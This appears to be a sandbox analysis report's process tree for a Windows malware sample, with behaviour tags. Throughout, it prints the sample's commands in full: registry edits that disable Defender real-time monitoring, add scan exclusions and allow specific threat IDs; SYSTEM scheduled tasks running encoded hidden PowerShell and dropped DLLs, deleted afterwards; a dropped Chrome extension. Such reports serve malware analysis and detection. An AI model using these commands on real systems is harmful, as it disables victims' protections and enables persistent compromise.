C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1768
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcsurbRXx" /SC once /ST 00:39:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2196
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcsurbRXx"3⤵PID:888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcsurbRXx"3⤵PID:2768
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2472
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:1928
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:323⤵PID:2728
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:776
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:643⤵PID:1188
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:323⤵PID:2816
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵PID:2692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:643⤵PID:2804
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵PID:2908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\QqEAMUespgTHJnVz\pRWlRAFN\tPNYuJXRGRhoEVeU.wsf"3⤵PID:2924
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\QqEAMUespgTHJnVz\pRWlRAFN\tPNYuJXRGRhoEVeU.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2872 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:324⤵PID:960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:644⤵PID:1020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:324⤵PID:2076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:644⤵PID:1580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:324⤵PID:3016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:644⤵PID:1792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:324⤵PID:1560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:644⤵PID:2168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:324⤵PID:2028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hsUwQAlMU" /t REG_DWORD /d 0 /reg:644⤵PID:2408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:324⤵PID:2036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\nivjmgppGaMJQQVB" /t REG_DWORD /d 0 /reg:644⤵PID:320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:1708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:324⤵PID:3024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy" /t REG_DWORD /d 0 /reg:644⤵PID:2348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵PID:1780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵PID:2508
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "glbrHFzvn" /SC once /ST 00:30:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2264
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "glbrHFzvn"3⤵PID:2744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "glbrHFzvn"3⤵PID:2324
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1456
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2416
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:2448
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2320
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 00:57:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\ukITios.exe\" 0c /CbVtdidRY 385115 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZTNkTKukmvvbOMPkn"3⤵PID:1436
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 6283⤵
- Loads dropped DLL
- Program crash
PID:2172
-
-
-
C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\ukITios.exeC:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\ukITios.exe 0c /CbVtdidRY 385115 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:328 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:2092
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:2112
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:112
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:780
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:1740
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2128
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:1692
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:1540
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1048
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:588
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:576
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2156
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2012
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:2268
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:1168
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2420 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2152
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"3⤵PID:1080
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:1460
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:3028
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:3020
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2412
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2408
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2124 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\aIZmJt.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3032
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\MnQMHNC.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ucrVpivlTlXwlAC"3⤵PID:976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ucrVpivlTlXwlAC"3⤵PID:2232
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\ornwinl.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:3044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\teBiucL.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2456
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\bejEKGh.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\ZNdwwdV.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:3020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 00:48:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\mxSiIqIJ\vkXNImf.dll\",#1 /WKdidi 385115" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BjyVbWVaXyfCTlHuI"3⤵PID:2552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"3⤵PID:2720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 15163⤵
- Loads dropped DLL
- Program crash
PID:2800
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\mxSiIqIJ\vkXNImf.dll",#1 /WKdidi 3851152⤵PID:2548
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\mxSiIqIJ\vkXNImf.dll",#1 /WKdidi 3851153⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1664 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"4⤵PID:2804
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {C51C78E9-CC8D-449B-B6C8-41C1D1F9E142} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]1⤵PID:1304
-
